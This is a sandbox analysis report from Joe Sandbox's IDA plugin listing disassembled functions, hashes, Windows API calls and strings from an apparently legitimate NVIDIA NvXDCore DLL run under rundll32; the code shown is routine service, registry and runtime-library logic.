Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$Module$EnterErrorFileHandleInitializeLastLeaveName_invalid_parameter_noinfo
String ID: Module$Module_Raw$REGISTRY
API String ID: 667740459-549000027
Opcode ID: bcc9742317c672c1c95da3a535c912253a9343660d15b91ab2b38c131fa592cd
Instruction ID: 281ba3dff20c74d366180b8ffcdd62c128dee2bf5c8a1232fa45458b2cfdfcb3
Opcode Fuzzy Hash: bcc9742317c672c1c95da3a535c912253a9343660d15b91ab2b38c131fa592cd
Instruction Fuzzy Hash: 3B71A222B2878295EB28DB21D860AF92370FF44788F805076DA6E57ADDEF7CE545C740

Function 00007FFDFA8E0DB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 162synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8DE05C: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE11F

WaitForSingleObject.KERNEL32 ref: 00007FFDFA8E0FE9
SetEvent.KERNEL32 ref: 00007FFDFA8E0FFA
SetEvent.KERNEL32 ref: 00007FFDFA8E1007
SetEvent.KERNEL32 ref: 00007FFDFA8E1057

Strings

Releasing lease, xrefs: 00007FFDFA8E0F47
NvXDCore.cpp, xrefs: 00007FFDFA8E0DFD, 00007FFDFA8E0E0C, 00007FFDFA8E0EF3, 00007FFDFA8E0F02
Nvidia::UXDriver::Core::NvXDCorePlugin::OnStop, xrefs: 00007FFDFA8E0E29, 00007FFDFA8E0E38, 00007FFDFA8E0F1F, 00007FFDFA8E0F2E
Received Service Stop request from NvContainer, xrefs: 00007FFDFA8E0E51

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Event$Init_thread_footerObjectSingleWait
String ID: NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStop$Received Service Stop request from NvContainer$Releasing lease
API String ID: 1241757697-2813696767
Opcode ID: 07cdadacfe6124c7e27f98328c3df111e83a9041b0ca63e8cf450c78d187c62d
Instruction ID: 3dbf2a5c6cf6a3d095b5f2b122dafa65de4ad578590e3a50f693767b419d4c80
Opcode Fuzzy Hash: 07cdadacfe6124c7e27f98328c3df111e83a9041b0ca63e8cf450c78d187c62d
Instruction Fuzzy Hash: D9814C36B18B4299EB189B60E8A05ED37A4FF84784F900176EA6D43BADEF3CD545C340

Function 00007FFDFA8AD188 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FFDFA8AB4A1), ref: 00007FFDFA8AD1F1
GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FFDFA8AB4A1), ref: 00007FFDFA8AD220

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

SetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FFDFA8AB4A1), ref: 00007FFDFA8AD2BB
LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FFDFA8AB4A1), ref: 00007FFDFA8AD316
LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FFDFA8AB4A1), ref: 00007FFDFA8AD352

Strings

RegOpenKeyExW, xrefs: 00007FFDFA8AD1E7
RegCloseKey, xrefs: 00007FFDFA8AD216
Advapi32.dll, xrefs: 00007FFDFA8AD1BF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressFreeLocalProc$ConditionErrorInfoLastMaskVerifyVersion
String ID: Advapi32.dll$RegCloseKey$RegOpenKeyExW
API String ID: 2895588624-618571997
Opcode ID: c274dfffcf539c4011ebde4711aa22a1165f4ce2621b98982a0dc9153418fb4f
Instruction ID: 9df79b7dbe9762282ee886f9d1342a757da78490d03ad1a36fa43c384cc14556
Opcode Fuzzy Hash: c274dfffcf539c4011ebde4711aa22a1165f4ce2621b98982a0dc9153418fb4f
Instruction Fuzzy Hash: EC514C21B2DA0391FF989B11A860A796290EF45BC4F4844B5DD6F8B7ECEF6CE446C310

Function 00007FFDFA8D1E88 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_Getcvt.LIBCPMT ref: 00007FFDFA8D1ED6
_Getcvt.LIBCPMT ref: 00007FFDFA8D1F2E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D1F58
_Mbrtowc.LIBCPMT ref: 00007FFDFA8D1FE7
_Mbrtowc.LIBCPMT ref: 00007FFDFA8D2026

Strings

,, xrefs: 00007FFDFA8D1FF5
true, xrefs: 00007FFDFA8D1F9D
false, xrefs: 00007FFDFA8D1F83

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: GetcvtMbrtowc$Concurrency::cancel_current_task
String ID: ,$false$true
API String ID: 2918530961-760133229
Opcode ID: adc745f2ded1067c46ff1a729a57b721d965c5c6baca99a7af2e728b9b9ee34a
Instruction ID: db972491668ffcc3e0ebd25038cd712da1fa2e13d9917a77b44dbf281850559e
Opcode Fuzzy Hash: adc745f2ded1067c46ff1a729a57b721d965c5c6baca99a7af2e728b9b9ee34a
Instruction Fuzzy Hash: F0519E22618BC192D724CB21E4506AE77B0FB88790F405276EF9D87B99EF7CD195C740

Function 00007FFDFA8B9438 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

new.LIBCMT ref: 00007FFDFA8B94D2
new.LIBCMT ref: 00007FFDFA8B9502
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA8B9538

Part of subcall function 00007FFDFA8B0A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B0AB2

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B9548

Part of subcall function 00007FFDFA971390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97140D
Part of subcall function 00007FFDFA971390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97144C

Strings

XMLLogPrinter, xrefs: 00007FFDFA8B94EB
No LogPrinter defined with such nume., xrefs: 00007FFDFA8B952D
ClassName, xrefs: 00007FFDFA8B947A, 00007FFDFA8B9489
SimpleTextLogPrinter, xrefs: 00007FFDFA8B94B9

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: ClassName$No LogPrinter defined with such nume.$SimpleTextLogPrinter$XMLLogPrinter
API String ID: 2903377776-3681829448
Opcode ID: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
Instruction ID: 57a4373224d9abc6fb1dce2ba1cbd9c2c319eb536eeda30c55d0a20f28986754
Opcode Fuzzy Hash: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
Instruction Fuzzy Hash: 86317222B15A4298EB58DF21D861AEC3365EF447C8FC15572DA2D877DEEF68E604C380

Function 00007FFDFA8AE290 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AE2C3
GetProcAddress.KERNEL32 ref: 00007FFDFA8AE2D8
GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AE332
GetProcAddress.KERNEL32 ref: 00007FFDFA8AE347
RegDeleteKeyW.ADVAPI32 ref: 00007FFDFA8AE399

Strings

RegDeleteKeyTransactedW, xrefs: 00007FFDFA8AE2CE
RegDeleteKeyExW, xrefs: 00007FFDFA8AE33D
Advapi32.dll, xrefs: 00007FFDFA8AE2BC, 00007FFDFA8AE32B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 1be05aa186b517d8e315ca0390f6c762f93e95b826797c49909e1833bbc15feb
Instruction ID: f8a8c65a5416a38a8c9f31f66fe2e580cf035bdb76d1ea474f0795516428701e
Opcode Fuzzy Hash: 1be05aa186b517d8e315ca0390f6c762f93e95b826797c49909e1833bbc15feb
Instruction Fuzzy Hash: EB316B25B1DA5291FB189B11E874B7863A0AF48BC4F9C48B5CA6D4B7ECDF6CE4818310

Function 00007FFDFA8AC620 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDFA8AC678
GetProcAddress.KERNEL32 ref: 00007FFDFA8AC6A8
GetLastError.KERNEL32 ref: 00007FFDFA8AC6BA

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

Strings

RegOpenKeyExW, xrefs: 00007FFDFA8AC66E
RegCloseKey, xrefs: 00007FFDFA8AC69E
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FFDFA8AC6E5
Advapi32.dll, xrefs: 00007FFDFA8AC64A
CurrentBuildNumber, xrefs: 00007FFDFA8AC700

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc$ConditionErrorInfoLastMaskVerifyVersion
String ID: Advapi32.dll$CurrentBuildNumber$RegCloseKey$RegOpenKeyExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3372643087-2525593150
Opcode ID: 4138a556be4e36f1c6ec5994f7970d6f94c359b06625e77941bd0f78e503e05d
Instruction ID: a27255a19ede7c8284f079da8755d2acb46900ddc7b499bc2dd0cb517c33becd
Opcode Fuzzy Hash: 4138a556be4e36f1c6ec5994f7970d6f94c359b06625e77941bd0f78e503e05d
Instruction Fuzzy Hash: 77314B35B2DB4391EB488B45F860A6873A4BF48B84F4850B6D96D473E8EF7CE4068300

Function 00007FFDFA8DE570 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 235COMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00007FFDFA8DE591
WTSEnumerateSessionsW.WTSAPI32 ref: 00007FFDFA8DE5E9
WTSFreeMemory.WTSAPI32 ref: 00007FFDFA8DE6F5

Strings

NvXDCore.cpp, xrefs: 00007FFDFA8DE5AC
launching sync from child processes, xrefs: 00007FFDFA8DE849
child processes Session id is, xrefs: 00007FFDFA8DE5BA
CreateChildProcesses, xrefs: 00007FFDFA8DE5B3

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ActiveConsoleEnumerateFreeMemorySessionSessions
String ID: CreateChildProcesses$NvXDCore.cpp$child processes Session id is$launching sync from child processes
API String ID: 1575273685-1535587637
Opcode ID: 87ec771f0fe3288fe32883445848f72c1213374a5a1994cfcb171297897ea939
Instruction ID: 87899f54fc8df1799b243ccd2ba638840237fdbc1faeec303897f776dd7f71ce
Opcode Fuzzy Hash: 87ec771f0fe3288fe32883445848f72c1213374a5a1994cfcb171297897ea939
Instruction Fuzzy Hash: 82B12632B14B429AE714DFA0E4505ED33B9FB44788B80167AEE5D67BADDE38E115C380

Function 00007FFDFA8ACF24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 161libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFDFA8ACFA8
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFDFA8ACFD4

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalAlloc.KERNEL32 ref: 00007FFDFA8AD095
LocalFree.KERNEL32 ref: 00007FFDFA8AD133

Part of subcall function 00007FFDFA8ACCF0: GetProcAddress.KERNEL32 ref: 00007FFDFA8ACD50
Part of subcall function 00007FFDFA8ACCF0: GetProcAddress.KERNEL32 ref: 00007FFDFA8ACD80
Part of subcall function 00007FFDFA8ACCF0: GetProcAddress.KERNEL32 ref: 00007FFDFA8ACDAC
Part of subcall function 00007FFDFA8ACCF0: GetProcAddress.KERNEL32 ref: 00007FFDFA8ACDD8

Strings

SetupDiGetDeviceRegistryPropertyW, xrefs: 00007FFDFA8ACF9E
Setupapi.dll, xrefs: 00007FFDFA8ACF7D
SetupDiDestroyDeviceInfoList, xrefs: 00007FFDFA8ACFCA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
API String ID: 576420853-448828884
Opcode ID: 75ca3b4daf19c0ae202a036e62fa29883766883f936f302ba286705c7fc52e7c
Instruction ID: 436b8baa4f8d9b857a7939a2c2fb01406412b5518cc6c189ad91686f4a692c00
Opcode Fuzzy Hash: 75ca3b4daf19c0ae202a036e62fa29883766883f936f302ba286705c7fc52e7c
Instruction Fuzzy Hash: 52616132B19A0299FB58CF51D860AB973A1FB48788F444476CD6D8B79CEF7CE4468350

Function 00007FFDFA8CBD68 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

_Getcvt.LIBCPMT ref: 00007FFDFA8CBDA0
_Getcvt.LIBCPMT ref: 00007FFDFA8CBDC9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8CBDF3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8CBE3A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8CBE81

Strings

true, xrefs: 00007FFDFA8CBE5B
false, xrefs: 00007FFDFA8CBE14

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Getcvt
String ID: false$true
API String ID: 3170190159-2658103896
Opcode ID: 0e837c9145906b3ea6b36b17c7af4290a757a23d09f280867575f110399d340f
Instruction ID: 39cb584c118e2f24a19c6a7f838a6e4637a997f15c430e829881e6f0b7dde3c1
Opcode Fuzzy Hash: 0e837c9145906b3ea6b36b17c7af4290a757a23d09f280867575f110399d340f
Instruction Fuzzy Hash: 7441E226B19B9240EB19AB21D12867D67A1AF44FD4F5582B2CF6D0B7DECF3CE4068340

Function 00007FFDFA8B3848 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B38F2
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3915
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3941
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3965
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B3989

Strings

returned , xrefs: 00007FFDFA8B389F
RegistryException: , xrefs: 00007FFDFA8B388E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_$__std_exception_copy
String ID: returned $RegistryException:
API String ID: 3384336446-434066331
Opcode ID: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
Instruction ID: 8e4c15a6ccedd4d48736ddad7d52a4c49e523580f7a1ce66aaebaa32d59f480c
Opcode Fuzzy Hash: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
Instruction Fuzzy Hash: FE419C72B14A4198FB188FA5E8505EC7336EB447C8B804076CE6DA7BEEDE38D556C340

Function 00007FFDFA96C460 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C4A9
GetLastError.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C4B3
GetLastError.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C4DF

Part of subcall function 00007FFDFA96ADF0: _Init_thread_footer.LIBCMT ref: 00007FFDFA96AE4A

RemoveDirectoryW.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C518
GetLastError.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C522
GetLastError.KERNEL32(?,?,?,00007FFDFA96C449), ref: 00007FFDFA96C54E

Strings

boost::filesystem::remove, xrefs: 00007FFDFA96C4E9, 00007FFDFA96C558

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
